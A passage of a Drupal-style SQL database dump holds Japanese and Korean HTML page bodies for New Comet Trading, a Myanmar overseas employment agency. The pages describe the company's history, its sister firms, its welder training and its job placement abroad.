style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 172, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> \"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧 해외 직업 소개회사</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span 